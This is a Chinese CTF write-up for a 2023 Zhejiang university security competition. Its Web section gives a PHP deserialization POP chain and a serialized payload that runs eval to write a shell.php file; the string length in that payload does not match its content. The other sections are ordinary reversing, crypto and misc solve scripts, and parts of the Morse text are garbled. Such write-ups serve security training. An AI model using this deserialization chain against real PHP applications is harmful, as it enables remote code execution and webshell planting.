2023浙江省大学生信息安全竞赛初赛 部分wp

Web

easy php

BBB::__debuginfo() -> CCC::__toString() -> AAA::__call()

class AAA{
    public $cmd;

    public function __call($name, $arguments){
        eval($this->cmd);
        return "done";
    }
}

class BBB{
    public $param1;
    public function __construct($param1){
        $this->param1 = $param1;
    }
    public function __debuginfo(){
        return [
            'debugInfo' => 'param1' . $this->param1 
        ];
    }
}

class CCC{
    public $func;

    public function __toString(){
        var_dump("aaa");
        $this->func->aaa();
    }
}

if(isset($_GET['aaa'])){
    $aaa = $_GET['aaa'];
    var_dump(unserialize($aaa));
}


$C = new CCC();
$B = new BBB($C);
$A = new AAA();
$A ->cmd= "file_put_contents('shell.php','');";
$C->func = $A; 

echo serialize($B);
# O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:58:"file_put_contents('shell.php','');";}}}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

RE

pyccc

uncompyle6.exe 逆不出py

逆出如下文件

分析可知 先初始化一个数组 再对其内的每个元素异或其下标

c=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
# print(len(c))
tem = ""
for i in range(len(c)):
    tem += chr((c[i]) ^ i)
print(tem,end="")
1
2
3
4
5
6

flag{1t_is_very_hap4y!!}

ezapk

反编译apk

解aes

Crypto

小小数学家

re 匹配数字和符号进行运算

import re
num = re.compile("\d+")
symble = re.compile("\W")

with open("./flag.txt", "r")as f:
    lines = f.readlines()

    for line in lines:
        nums = (num.findall(line))
        symbles = (symble.findall(line))
        print(chr(int(eval(nums[0]+ symbles[0] + nums[1]))),end="")
1
2
3
4
5
6
7
8
9
10
11

DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}

基础数论

sage解p² + q² =n

import hashlib

c = 173178061442550241596295506150572803829268102881297542445649200353047297914764783385643705889370567071577408829104128703765633248277722687055281420899564198724968491216409225857070531370724352556864154450614891750313803499101686782558259953244119778256806332589612663957000269869144555485216828399422391672121
x,y = (two_squares(c))
print(x,y)
print(hashlib.md5(str(x+y).encode()).hexdigest())

1
2
3
4
5
6
7

8ef20a4873c5ec776dd34bf5f0eb56cf

MISC

number game

后端就只有个js文件，可以发现roll这段代码很关键（因为题目说通过roll得到flag）

将这段js复制处理，放入console，把if的判断条件改为true，然后再次点击roll，可以发现弹
flag了

Ez_misc

拿到题目，根据jpg的文件头，可以发现每两位16进制是反的，那么我们只需要翻转就行了

使用脚本进行反转

'''
A.bin
21.7.22
'''
input=open('C:/Users/Abin/Desktop/yuanshen','rb')
input_all = input.read()
ss =input_all[::-1]
output=open('C:/Users/Abin/Desktop/y.zip','wb')
output.write(ss)
input.close()
output.close()
1
2
3
4
5
6
7
8
9
10
11

反转之后的结果并不是正确的（因为是逆序的十六进制），我们还需要将整体的字符串反
转，这里我使用工具进行反转

数据放入010中生成图片

使用steghide进行解密，获得flag.txt

DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT
DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT
DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH
DASHDASHDOTDOTDOT DASHDOTDOT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

根据摩斯密码的特征，及那个DASH转为-，DOT转为.，获得下面的代码

-… -… -… -.-. -… .---- -… --… --… -… -… …- -… -… …-- …- -… -… …-- -… …-- …-- …–
… -… .---- -… …— …-- …-- …-- …- …-- …— -… .---- …-- … -… …— …-- …-- -… …— -…
…— …-- —… …-- … …-- … -… .---- …-- …- …-- -… …-- …- -… …- …-- --… -… …— -…
…— …-- …- -… … -… …-- --… -…

解得flag
flag{df4f635ab342a5b3bb855a464d7bb4ec}